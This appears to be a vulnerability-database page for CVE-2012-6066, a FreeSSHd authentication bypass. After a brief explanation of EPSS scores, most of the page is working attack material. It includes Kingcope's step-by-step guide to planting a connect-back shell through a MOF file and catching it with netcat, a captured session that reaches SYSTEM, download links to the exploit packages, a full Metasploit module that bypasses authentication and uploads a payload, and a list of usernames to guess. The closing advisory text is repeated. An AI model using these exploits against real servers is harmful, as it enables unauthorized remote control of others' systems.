CVE-2012-6066 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

FreeFTPD all versions Remote System Level Exploit Zero-Day -- No username needed, straightforward rooting! Discovered & Exploited By Kingcope Year 2011 -- https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/23079.zip Example banner: WeOnlyDo-wodFTPD 2.3.6.165 This package includes all you need to successfully root any version of FreeFTPD: * Modified version of ssh.exe (FreeFTPD authentication bypass) * sftp.exe for connecting to the server * nullevent.exe connect back shell that is uploaded to the server * nullevent.mof file which is uploaded to the server to execute the connect back shell * MSVCR100.dll that is needed by nullevent.exe * scan logs for your pleasure! We make use of the STUXNET technique to execute code, So let's go: 1.) Setup a netcat on a host you have, firewall open on the listening port 2.) modify nullevent.mof in an editor (where the ip and port is) according to your netcat config 3.) connect to the FreeSSHD: sftp.exe -S ./ssh.exe <ip/host> 4.) upload (put) nullevent.exe: put nullevent.exe 5.) upload (put) MSVCR100.dll: put MSVCR100.dll 6.) upload (put) nullevent.mof to wbem/mof/nullevent.mof: put nullevent.mof wbem/mof/nullevent.mof 7.) Enjoy your system shell which will blink up on you netcat after 1 minute!! 8.) Cleanup by deleting nullevent.exe located in c:\windows\system32\ 8.) Enjoy! 9.) Enjoy! 10.) Enjoy! Example exploitation session: C:\Users\KC\Desktop\FreeFTPD_0day>sftp -S ./ssh.exe 83.241.214.171 Could not create directory '/home/KC/.ssh'. The authenticity of host '83.241.214.171 (83.241.214.171)' can't be established. RSA key fingerprint is a8:ba:6d:0a:c6:ae:8b:a1:b6:47:7b:43:a8:de:4b:8e. Are you sure you want to continue connecting (yes/no)? yes Failed to add the host to the list of known hosts (/home/KC/.ssh/known_hosts). Connected to 83.241.214.171. sftp> put nullevent.exe Uploading nullevent.exe to /nullevent.exe nullevent.exe 100% 7168 7.0KB/s 00:00 sftp> put MSVCR100.dll Uploading MSVCR100.dll to /MSVCR100.dll MSVCR100.dll 100% 751KB 22.8KB/s 00:33 sftp> put nullevent.mof wbem/mof/nullevent.mof Uploading nullevent.mof to /wbem/mof/nullevent.mof nullevent.mof 100% 691 0.7KB/s 00:00 sftp> [root@vs2067037 ~]# nc -v -l 443 Connection from 83.231.224.193 port 443 [tcp/https] accepted Microsoft Windows [Version 5.2.3790] (C) Copyright 1985-2003 Microsoft Corp. C:\WINDOWS\system32>whoami whoami nt authority\system

require 'msf/core' require 'tempfile' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp include Msf::Exploit::EXE def initialize(info={}) super(update_info(info, 'Name' => "Freesshd Authentication Bypass", 'Description' => %q{ This module exploits a vulnerability found in FreeSSHd <= 1.2.6 to bypass authentication. You just need the username (which defaults to root). The exploit has been tested with both password and public key authentication. }, 'License' => MSF_LICENSE, 'Author' => [ 'Aris', # Vulnerability discovery and Exploit 'kcope', # 2012 Exploit 'Daniele Martini <cyrax[at]pkcrew.org>' # Metasploit module ], 'References' => [ [ 'CVE', '2012-6066' ], [ 'OSVDB', '88006' ], [ 'BID', '56785' ], [ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2012-12/0012.html' ], [ 'URL', 'http://seclists.org/fulldisclosure/2010/Aug/132' ] ], 'Platform' => 'win', 'Privileged' => true, 'DisclosureDate' => "Aug 11 2010", 'Targets' => [ [ 'Freesshd <= 1.2.6 / Windows (Universal)', {} ] ], 'DefaultTarget' => 0 )) register_options( [ OptInt.new('RPORT', [false, 'The target port', 22]), OptString.new('USERNAMES',[true,'Space Separate list of usernames to try for ssh authentication','root admin Administrator']) ], self.class) end def load_netssh begin require 'net/ssh' return true rescue LoadError return false end end def check connect banner = sock.recv(30) disconnect if banner =~ /SSH-2.0-WeOnlyDo/ version=banner.split(" ")[1] return Exploit::CheckCode::Vulnerable if version =~ /(2.1.3|2.0.6)/ return Exploit::CheckCode::Appears end return Exploit::CheckCode::Safe end def upload_payload(connection) exe = generate_payload_exe filename = rand_text_alpha(8) + ".exe" cmdstager = Rex::Exploitation::CmdStagerVBS.new(exe) opts = { :linemax => 1700, :decoder => File.join(Msf::Config.install_root, "data", "exploits", "cmdstager", "vbs_b64"), } cmds = cmdstager.generate(opts) if (cmds.nil? or cmds.length < 1) print_error("The command stager could not be generated") raise ArgumentError end cmds.each { |cmd| ret = connection.exec!("cmd.exe /c "+cmd) } end def setup_ssh_options pass=rand_text_alpha(8) options={ :password => pass, :port => datastore['RPORT'], :timeout => 1, :proxies => datastore['Proxies'], :key_data => OpenSSL::PKey::RSA.new(2048).to_pem } return options end def do_login(username,options) print_status("Trying username "+username) options[:username]=username transport = Net::SSH::Transport::Session.new(datastore['RHOST'], options) auth = Net::SSH::Authentication::Session.new(transport, options) auth.authenticate("ssh-connection", username, options[:password]) connection = Net::SSH::Connection::Session.new(transport, options) begin Timeout.timeout(10) do connection.exec!('cmd.exe /c echo') end rescue RuntimeError return nil rescue Timeout::Error print_status("Timeout") return nil end return connection end def exploit # # Load net/ssh so we can talk the SSH protocol # has_netssh = load_netssh if not has_netssh print_error("You don't have net/ssh installed. Please run gem install net-ssh") return end options=setup_ssh_options connection = nil usernames=datastore['USERNAMES'].split(' ') usernames.each { |username| connection=do_login(username,options) break if connection } if connection print_status("Uploading payload. (This step can take up to 5 minutes. But if you are here, it will probably work. Have faith.)") upload_payload(connection) handler end end end

FreeSSHD all version Remote Authentication Bypass ZERODAY Discovered & Exploited by Kingcope Year 2011 # Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/23080.zip Run like: ssh.exe -l<valid username> <host> valid username might be: root admin administrator webadmin sysadmin netadmin guest user web test ssh sftp ftp or anything you can imagine. The vulnerable banner of the most recent version is: SSH-2.0-WeOnlyDo 2.1.3 For your pleasure, KingcopeFreeSSHD all version Remote Authentication Bypass ZERODAY Discovered & Exploited by Kingcope Year 2011 Run like: ssh.exe -l<valid username> <host> valid username might be: root admin administrator webadmin sysadmin netadmin guest user web test ssh sftp ftp or anything you can imagine. The vulnerable banner of the most recent version is: SSH-2.0-WeOnlyDo 2.1.3 For your pleasure, Kingcope